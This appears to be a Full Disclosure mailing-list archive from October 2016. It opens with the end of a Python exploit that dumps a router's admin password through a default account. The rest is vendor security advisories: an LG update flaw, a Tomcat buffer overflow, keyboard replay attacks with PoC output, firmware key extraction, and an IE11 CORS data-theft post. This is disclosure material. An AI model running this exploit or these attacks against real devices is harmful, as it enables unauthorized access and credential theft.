# Step 1: the hardcoded user/user account is enough to fetch the configuration
# backup over HTTP basic auth; it carries the admin password base64-encoded.
r = requests.get("http://" + host + "/backupsettings.conf", auth=(def_user, def_pass))
if r.status_code == 200:
    print("[+] Seems the exploit worked [+]")
    print("[+] Dumping data . . . [+]")
    temp = r.text
    tag = ""   # element name that wraps the admin password in backupsettings.conf (fill in)
    admin_pass = temp.split("<" + tag + ">")[1].split("</" + tag + ">")[0]
    # print("[+] Admin password : " + base64.b64decode(admin_pass).decode() + " [+]")
    execute_payload(base64.b64decode(admin_pass).decode())
else:
    print("[-] Exploit Failed [-]")
print("\n[+] https://www.infogen.al/ [+]\n\n")


[FD] BFS-SA-2016-004: LG PC Suite Insecure Update Mechanism

2016-10-11 Thread Blue Frost Security Research Lab
___

Vendor: LG, www.lg.com
Affected Products:  LG PC Suite for Windows
Affected Version:   <= 5.3.25.20150529 (Build 18212)
Severity:   High
OVE ID: OVE-20161010-0007


The LG PC Suite update mechanism is vulnerable to a man-in-the-middle
attack. Through the manipulation of files transmitted over HTTP an
attacker can force the execution of arbitrary code on the target system.
Code is executed with the privileges of the currently logged on user.

LG will not provide software updates to address the issue because the
LG PC Suite reached the end of its product life cycle. The technical
details as well as a possible mitigation are described in the full
advisory at:

https://labs.bluefrostsecurity.de/advisories/bfs-sa-2016-004/




[FD] [SECURITY] CVE-2016-6808 Apache Tomcat JK ISAPI Connector buffer overflow

2016-10-11 Thread Mark Thomas
CVE-2016-6808 Apache Tomcat JK ISAPI Connector buffer overflow

Severity: Moderate

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat JK ISAPI Connector 1.2.0 to 1.2.41

Description
The IIS/ISAPI specific code implements special handling when a virtual
host is present. The virtual host name and the URI are concatenated to
create a virtual host mapping rule. The length checks prior to writing
to the target buffer for this rule did not take account of the length of
the virtual host name, creating the potential for a buffer overflow.
It is not known if this overflow is exploitable.

Mitigation
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat JK ISAPI Connector 1.2.42
- Where available, use IIS configuration to restrict the maximum URI
  length to 4095 - (the length of the longest virtual host name)

Credit:
This issue was discovered by The Apache Tomcat Security Team.


References:
[1] http://tomcat.apache.org/security-jk.html
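To make the length-check flaw above concrete, here is an added C model of the rule construction the advisory describes; it is not the mod_jk ISAPI redirector source. The 4096-byte rule buffer, the function names and the plain host+URI concatenation are assumptions chosen so that the advisory's "4095 - (length of the longest virtual host name)" workaround falls out of the arithmetic.

```c
#include <stdio.h>
#include <string.h>

#define RULE_BUF 4096   /* assumed size of the virtual host mapping rule buffer */

/* Vulnerable check, as the advisory describes it: only the URI length is
 * compared against the buffer, the virtual host prefix is forgotten.
 * Returns 1 if the write would be allowed, 0 if rejected. */
int vhost_rule_check_vuln(const char *vhost, const char *uri, size_t buflen)
{
    (void)vhost;                      /* the bug: never looked at */
    return strlen(uri) < buflen;      /* room for uri + NUL only */
}

/* Fixed check: account for every byte that will land in the buffer,
 * the host, the URI and the terminating NUL. */
int vhost_rule_check_fixed(const char *vhost, const char *uri, size_t buflen)
{
    return strlen(vhost) + strlen(uri) + 1 <= buflen;
}

/* Build the concatenated rule only when the fixed check passes.
 * Returns 0 on success, -1 when the rule would not fit. */
int build_vhost_rule(const char *vhost, const char *uri, char *out, size_t outlen)
{
    if (!vhost_rule_check_fixed(vhost, uri, outlen))
        return -1;
    memcpy(out, vhost, strlen(vhost));
    memcpy(out + strlen(vhost), uri, strlen(uri) + 1);
    return 0;
}

/* The IIS workaround from the advisory: the longest URI that is still safe
 * given the longest virtual host name the server will see. */
size_t max_safe_uri_len(size_t longest_vhost_len)
{
    return (RULE_BUF - 1) - longest_vhost_len;   /* 4095 - len(vhost) */
}

/* Does a URI of uri_len bytes pass the vulnerable check while failing the
 * fixed one?  If so, the vulnerable code would write past the buffer. */
int overflow_possible(const char *vhost, size_t uri_len)
{
    char uri[RULE_BUF + 1];           /* constructed request URI, all 'A' */
    if (uri_len > RULE_BUF)
        uri_len = RULE_BUF;
    memset(uri, 'A', uri_len);
    uri[uri_len] = '\0';
    return vhost_rule_check_vuln(vhost, uri, RULE_BUF)
        && !vhost_rule_check_fixed(vhost, uri, RULE_BUF);
}

int main(void)
{
    const char *vhost = "www.example.com";        /* 15 bytes, assumed host */
    size_t lens[] = { 4080, 4081, 4090, 4095 };
    size_t i;
    for (i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("uri_len=%zu -> overflow possible: %d\n",
               lens[i], overflow_possible(vhost, lens[i]));
    printf("longest safe URI for %s: %zu\n", vhost, max_safe_uri_len(strlen(vhost)));
    return 0;
}
```

With a 15-byte host every URI between 4081 and 4095 bytes passes the vulnerable check yet needs more than 4096 bytes once the host is prepended; capping the URI at 4095 - 15 = 4080 in IIS closes that band, which is exactly why the workaround is expressed relative to the longest virtual host name rather than as a fixed number.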



[FD] [SYSS-2016-043] Microsoft Wireless Desktop 2000 - Cryptographic Issues (CWE-310), Insufficient Protection against Replay Attacks

2016-10-11 Thread Matthias Deeg
Advisory ID: SYSS-2016-043
Product: Microsoft Wireless Desktop 2000
Manufacturer: Microsoft
Affected Version(s): Ver. A
Tested Version(s): Ver. A
Vulnerability Type: Cryptographic Issues (CWE-310)
Insufficient Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-05-19
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH)



Overview:

Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of
a mouse and a keyboard.

The manufacturer describes the product as follows (see [1]):

"This keyboard features Advanced Encryption Standard (AES) technology,
which is designed to help protect your information by encrypting your
keystrokes. Each keyboard is permanently paired with its receiver at
the factory - no key information is ever shared over the air."

Due to an insecure implementation of the encrypted data communication,
the wireless keyboard Microsoft Wireless Desktop 2000 is prone to replay
attacks with certain restrictions.



Vulnerability Details:

The SySS GmbH found out that the Microsoft Wireless Desktop 2000
keyboard is prone to replay attacks with some limitations.

An attacker can sniff the AES-encrypted data packets of the 2.4 GHz
radio communication sent by the keyboard to the receiver (USB dongle)
and replay the recorded communication data causing the same effect as
the original data communication.

According to test results of the SySS GmbH, the Microsoft Wireless
Desktop 2000 keyboard and its USB dongle have implemented a replay
protection based on an incrementing packet counter. But the used
window for valid packet counter values is large enough to perform
a replay attack if there were not too many data packets caused by
further keystrokes between the attacker's recording and the playback.

A replay attack against the keyboard can, for example, be used to gain
unauthorized access to a computer system that is operated with a
vulnerable Microsoft Wireless Desktop 2000 keyboard. In this attack
scenario, an attacker records the radio communication during a
password-based user authentication of his or her victim, for instance
during a login to the operating system or during unlocking a screen
lock. At an opportune moment when the victim's computer system is
unattended, the attacker approaches the victim's computer and replays
the previously recorded AES-encrypted data communication for the
password-based user authentication and by this gets unauthorized access
to the victim's system.



Proof of Concept (PoC):

The SySS GmbH could successfully perform a replay attack as described
in the previous section using the USB radio dongle Crazyradio PA (see
[2]) and a simple proof-of-concept software tool.

The following output exemplarily illustrates a replay attack with the
recorded data packets for the word "test".

# python simple_replay.py
Simple nRF24 Replay Tool v0.1 by Matthias Deeg - SySS GmbH (c) 2016
[*] Configure radio
[*] Start recording. Press  to stop recording ...
[+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Received data: 083816016234008e
[+] Received data: 083816016234008e
[+] Received data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Received data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4
[+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4
[+] Received data: 0838160164340088
[+] Received data: 0838160164340088
[+] Received data: 099816019703529705956290664c0cda94ab28b6
[+] Received data: 099816019703529705956290664c0cda94ab28b6
[+] Received data: 0998160168690f3817261c9e068577dd450a245a
[+] Received data: 0998160168690f3817261c9e068577dd450a245a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4
[+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4
[+] Received data: 09981601f7612ae3b196b5767ab0a4dd615651e2
[+] Received data: 0838160168340084
[+] Received data: 0838160168340084
[+] Received data: 09981601db67b32134efa3fefd8b01efb124581d
[+] Received data: 09981601db67b32134efa3fefd8b01efb124581d
^C
[*] Stop recording
[*] Press  to replay the recorded data packets or  to
quit ...
[+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Send data: 083816016234008e
[+] Send data: 083816016234008e
[+] Send data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Send data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Send data: 

[FD] [SYSS-2016-068] Fujitsu Wireless Keyboard Set LX901 - Cryptographic Issues (CWE-310), Missing Protection against Replay Attacks

2016-10-11 Thread Matthias Deeg
Advisory ID: SYSS-2016-068
Product: Wireless Keyboard Set LX901
Manufacturer: Fujitsu
Affected Version(s): Model No. GK900
Tested Version(s): Model No. GK900
Vulnerability Type: Cryptographic Issues (CWE-310)
Missing Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-07-07
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH)



Overview:

Fujitsu Wireless Keyboard Set LX901 is a wireless desktop set consisting
of a mouse and a keyboard.

The manufacturer describes the product as follows (see [1]):

"The Wireless Keyboard LX901 is a top of the line desktop solution
for lifestyle orientated customers, who want only the best for their
desk. This superb keyboard set offers ambitious users more functions,
security and better features than a conventional interface device. It
even includes 2.4 GHz technology and 128 AES encryption for security."

Due to an insecure implementation of the encrypted data communication,
the wireless keyboard LX901 is vulnerable to replay attacks.



Vulnerability Details:

The SySS GmbH found that the wireless keyboard Fujitsu LX901 is prone to
replay attacks.

An attacker can sniff the AES-encrypted data packets of the 2.4 GHz
radio communication sent by the keyboard to the receiver (USB dongle)
and replay the recorded communication data at will, causing the same
effect as the original data communication.

A replay attack against the keyboard can, for example, be used to gain
unauthorized access to a computer system that is operated with a
vulnerable Fujitsu LX901 keyboard. In this attack scenario, an attacker
records the radio communication during a password-based user
authentication of his or her victim, for instance during a login to the
operating system or during unlocking a screen lock. At an opportune
moment when the victim's computer system is unattended, the attacker
approaches the victim's computer and replays the previously recorded
AES-encrypted data communication for the password-based user
authentication and thereby gets unauthorized access to the victim's
system.



Proof of Concept (PoC):

The SySS GmbH could successfully perform a replay attack as described
in the previous section using a software-defined radio in combination
with the software tool GNU Radio Companion.



Solution:

According to information from the manufacturer Fujitsu, the reported
security issue will currently not be fixed in affected products.

The written statement from Fujitsu regarding this security issue,
originally given in German, reads in English translation as follows:

"Thank you very much for your information about our wireless keyboard.
As we have already pointed out, we believe that the described scenario
is not easy to perform under real conditions due to the radio protocol
used. As mentioned, our product is not destined to sell security, but
convenience in the first place (without the security drawbacks of
unencrypted wireless keyboards). Any new information and insights will
be incorporated into the already planned successor product."



Disclosure Timeline:

2016-07-07: Vulnerability reported to manufacturer
2016-07-08: Manufacturer acknowledges e-mail with SySS security advisory
2016-08-02: E-mail from manufacturer requesting further information
2016-08-04: Provided further information to manufacturer via e-mail
2016-08-05: E-mail from manufacturer with further questions
2016-08-08: E-mail to manufacturer with answers to open questions
2016-08-12: E-mail from manufacturer with statement regarding the
reported security issue
2016-10-05: Public release of the security advisory



References:

[1] Product website for Fujitsu Wireless Keyboard Set
http://www.fujitsu.com/global/products/computing/peripheral/accessories/input-devices/keyboards/wl-keyboard-lx901.html
[2] SySS 

[FD] [SYSS-2016-043] Microsoft Wireless Desktop 2000 - Cryptographic Issues (CWE-310), Insufficient Protection against Replay Attacks

2016-10-11 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-043
Product: Microsoft Wireless Desktop 2000
Manufacturer: Microsoft
Affected Version(s): Ver. A
Tested Version(s): Ver. A
Vulnerability Type: Cryptographic Issues (CWE-310)
Insufficient Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-05-19
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH)



Overview:

Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of
a mouse and a keyboard.

The manufacturer describes the product as follows (see [1]):

"This keyboard features Advanced Encryption Standard (AES) technology,
which is designed to help protect your information by encrypting your
keystrokes. Each keyboard is permanently paired with its receiver at
the factory - no key information is ever shared over the air."

Due to an insecure implementation of the encrypted data communication,
the wireless keyboard Microsoft Wireless Desktop 2000 is prone to replay
attacks with certain restrictions.



Vulnerability Details:

The SySS GmbH found that the Microsoft Wireless Desktop 2000 keyboard is
prone to replay attacks with some limitations.

An attacker can sniff the AES-encrypted data packets of the 2.4 GHz
radio communication sent by the keyboard to the receiver (USB dongle)
and replay the recorded communication data, causing the same effect as
the original data communication.

According to the test results of the SySS GmbH, the Microsoft Wireless
Desktop 2000 keyboard and its USB dongle implement a replay protection
based on an incrementing packet counter. However, the window of packet
counter values the receiver accepts is large enough that a replay attack
succeeds as long as not too many data packets caused by further
keystrokes were sent between the attacker's recording and the playback.
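The receiver behaviours described in these two advisories, the Fujitsu LX901 accepting replayed packets without any counter check and the Microsoft Wireless Desktop 2000 checking an incrementing packet counter against a tolerant window, can be modelled without radio hardware. The following Python model is an added example, not code from the SySS advisories or from either vendor's firmware; the packet layout, the window size, the policy names and the helpers `Keyboard`, `Receiver` and `replay_accepted` are constructed assumptions. It shows why a wide acceptance window only postpones a replay until enough further keystrokes have been typed, and why the usual fix is a strictly monotonic counter with a small forward-only window for lost packets.

```python
"""Model of receiver-side replay checks for an encrypted keyboard link.

Added example, not code from the SySS advisories or any vendor firmware.
Packet layout, window sizes and policy names are constructed assumptions
used to illustrate the three behaviours described in the advisories:
  - "none":      no replay protection at all (LX901 as described)
  - "window":    incrementing counter, but any counter within +/- window
                 of the highest counter seen so far is accepted
  - "monotonic": only counters strictly above the last accepted one are
                 accepted, within a bounded forward window for lost packets
"""
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Packet:
    counter: int    # per-packet counter incremented by the keyboard
    payload: bytes  # would be the AES-encrypted keystroke; opaque here


class Keyboard:
    """Transmitter: increments a counter for every packet it sends."""

    def __init__(self) -> None:
        self.counter = 0

    def send(self, key: str) -> Packet:
        self.counter += 1
        # The key name stands in for the ciphertext; the receiver never
        # looks at it, only at the counter.
        return Packet(self.counter, key.encode())


@dataclass
class Receiver:
    policy: str
    window: int = 0
    last: Optional[int] = None                  # highest counter accepted
    accepted: List[bytes] = field(default_factory=list)

    def receive(self, pkt: Packet) -> bool:
        """Apply the replay policy; return True if the packet is accepted."""
        if self.policy == "none":
            ok = True
        elif self.policy == "window":
            # Tolerant check: old counters are still accepted as long as they
            # lie within the window below the highest counter seen so far.
            ok = self.last is None or abs(pkt.counter - self.last) <= self.window
        elif self.policy == "monotonic":
            # Strict check: the counter must advance, but may skip up to
            # `window` values so lost packets do not desynchronise the pair.
            ok = self.last is None or self.last < pkt.counter <= self.last + self.window
        else:
            raise ValueError(f"unknown policy {self.policy!r}")
        if ok:
            self.accepted.append(pkt.payload)
            if self.last is None or pkt.counter > self.last:
                self.last = pkt.counter
        return ok


def replay_accepted(policy: str, window: int, keystrokes_between: int) -> int:
    """Return how many of the four recorded packets a playback gets accepted.

    Scenario from the advisories: the word "test" is recorded while it is
    typed, the victim then types `keystrokes_between` further keys, and the
    recording is played back afterwards.
    """
    keyboard = Keyboard()
    receiver = Receiver(policy, window)
    recorded = [keyboard.send(c) for c in "test"]   # sniffed by the attacker
    for pkt in recorded:                             # legitimate delivery
        receiver.receive(pkt)
    for _ in range(keystrokes_between):              # victim keeps typing
        receiver.receive(keyboard.send("x"))
    return sum(receiver.receive(pkt) for pkt in recorded)   # playback


if __name__ == "__main__":
    for policy, window in (("none", 0), ("window", 16), ("monotonic", 16)):
        counts = [replay_accepted(policy, window, n) for n in (5, 14, 100)]
        print(f"{policy:9s} window={window:2d}: accepted after 5/14/100 keystrokes = {counts}")
```

Running the module prints how many of the four recorded packets each policy accepts after 5, 14 and 100 intervening keystrokes: with the tolerant window the count only falls from 4 to 0 once the legitimate counter has moved past the window, whereas the monotonic check rejects the playback regardless of timing while still accepting legitimate packets that skip a few lost counters. A monotonic counter is only as good as its persistence: if the receiver forgets the last accepted value on power loss, a reset reopens the window.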

A replay attack against the keyboard can, for example, be used to gain
unauthorized access to a computer system that is operated with a
vulnerable Microsoft Wireless Desktop 2000 keyboard. In this attack
scenario, an attacker records the radio communication during a
password-based user authentication of his or her victim, for instance
during a login to the operating system or during unlocking a screen
lock. At an opportune moment when the victim's computer system is
unattended, the attacker approaches the victim's computer and replays
the previously recorded AES-encrypted data communication for the
password-based user authentication and thereby gets unauthorized access
to the victim's system.



Proof of Concept (PoC):

The SySS GmbH could successfully perform a replay attack as described
in the previous section using the USB radio dongle Crazyradio PA (see
[2]) and a simple proof-of-concept software tool.

The following output illustrates, by way of example, a replay attack
with the recorded data packets for the word "test".

# python simple_replay.py
Simple nRF24 Replay Tool v0.1 by Matthias Deeg - SySS GmbH (c) 2016
[*] Configure radio
[*] Start recording. Press  to stop recording ...
[+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Received data: 083816016234008e
[+] Received data: 083816016234008e
[+] Received data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Received data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4
[+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4
[+] Received data: 0838160164340088
[+] Received data: 0838160164340088
[+] Received data: 099816019703529705956290664c0cda94ab28b6
[+] Received data: 099816019703529705956290664c0cda94ab28b6
[+] Received data: 0998160168690f3817261c9e068577dd450a245a
[+] Received data: 0998160168690f3817261c9e068577dd450a245a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4
[+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4
[+] Received data: 09981601f7612ae3b196b5767ab0a4dd615651e2
[+] Received data: 0838160168340084
[+] Received data: 0838160168340084
[+] Received data: 09981601db67b32134efa3fefd8b01efb124581d
[+] Received data: 09981601db67b32134efa3fefd8b01efb124581d
^C
[*] Stop recording
[*] Press  to replay the recorded data packets or  to
quit ...
[+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Send data: 083816016234008e
[+] Send data: 083816016234008e
[+] Send data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Send data: 

[FD] [SYSS-2016-033] Microsoft Wireless Desktop 2000 - Insufficient Protection of Code (Firmware) and Data (Cryptographic Key)

2016-10-11 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-033
Product: Microsoft Wireless Desktop 2000
Manufacturer: Microsoft
Affected Version(s): Ver. A
Tested Version(s): Ver. A
Vulnerability Type: Insufficient Protection of Code (Firmware) and
Data (Cryptographic Key)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-04-22
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Gerhard Klostermeier and Matthias Deeg (SySS GmbH)



Overview:

Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of
a mouse and a keyboard.

The manufacturer describes the product as follows (see [1]):

"This keyboard features Advanced Encryption Standard (AES) technology,
which is designed to help protect your information by encrypting your
keystrokes. Each keyboard is permanently paired with its receiver at
the factory - no key information is ever shared over the air."

Due to the insufficient protection of the flash memory of the keyboard
and of the USB dongle, an attacker with physical access has read and
write access to the firmware and the used cryptographic key.



Vulnerability Details:

The SySS GmbH found that the embedded flash memory of the wireless
keyboard Microsoft Wireless Desktop 2000 and of the corresponding USB
dongle can be read and written via the SPI interface of the transceivers
used, which carry an embedded microcontroller (nRF24LE1H in the keyboard,
nRF24LU1+ in the USB dongle), because the flash memory is not protected
by the readback protection feature these chips offer (RDISMB - Read
DISable Main Block).

Thus, an attacker with physical access to the keyboard or the USB
dongle can simply read and write the SPI-addressable code and data
flash memory. Due to the use of nRF24 transceiver versions with one-time
programmable memory, write access is limited in such a way that a set
1 bit can be changed to a 0 bit but not vice versa.

The AES cryptographic key used by the Microsoft Wireless Desktop 2000
keyboard and the corresponding USB dongle is for both devices accessible
via the SPI interface.

By having read and write access to the code and data flash memory, an
attacker can either extract the cryptographic key, for instance to
perform further attacks against the wireless communication, or modify
the firmware or the cryptographic key in a limited way due to the
used one-time programmable memory.



Proof of Concept (PoC):

The SySS GmbH could successfully read the contents of the code and data
flash memory of the Microsoft Wireless Desktop 2000 keyboard and of the
USB dongle using the hardware tool Bus Pirate [2] in combination with
the software tool nrfprog [3].



Solution:

The SySS GmbH is not aware of a solution for this reported security
vulnerability.

For further information please contact the manufacturer.



Disclosure Timeline:

2016-04-22: Vulnerability reported to manufacturer
2016-04-23: Manufacturer acknowledges e-mail with SySS security advisory
2016-06-06: E-mail to manufacturer asking about the current status
2016-06-27: Another e-mail to manufacturer asking about the current status
2016-06-27: E-mail from manufacturer requesting further information
2016-06-28: Provided further information and PoC software tool
2016-07-07: E-mail from manufacturer with further information and
question about intended disclosure
2016-07-08: E-mail to manufacturer concerning the planned responsible
disclosure
2016-08-04: E-mail from manufacturer concerning limitations of actual
attacks
2016-10-05: Public release of the security advisory



References:

[1] Product website for Microsoft Wireless Desktop 2000
https://www.microsoft.com/accessories/en-us/products/keyboards/wireless-desktop-2000/m7j-1
[2] Website of Bus Pirate hardware tool
http://dangerousprototypes.com/docs/Bus_Pirate
[3] nrfprog Github repository
https://github.com/nekromant/nrfprog
[4] SySS Security Advisory SYSS-2016-033
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-033.txt
[5] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Gerhard Klostermeier and
Matthias Deeg of the SySS GmbH.

E-Mail: gerhard.klostermeier (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc
Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7

E-Mail: 

Re: [FD] IE11 is not following CORS specification for local files

2016-10-11 Thread Ricardo Iramar dos Santos
I did a small improvement in this attack.
Using the IE File API
(https://msdn.microsoft.com/en-us/library/hh772315(v=vs.85).aspx) an
attacker would be able to create a web page with the content below and
send it to a victim.
A local file with the same content that I sent previously would be
created in the default download folder.
If the victim performs the three following clicks (Save, Open and Allow
blocked content), an attacker would be able to perform any request to
any domain and send the content to a domain which he/she controls.
If the attacker is in a MitM position this could be more interesting,
since the attacker could inject this content in an HTTP page and the
victim will tend to rely on that.
The next step would be to force the victim to click on the Save, Open
and Allow blocked content buttons.



Saving Files Locally

  if (typeof Blob !== "undefined") {
demoBlobs();
  }
  function demoBlobs(){
var blob = new Blob(["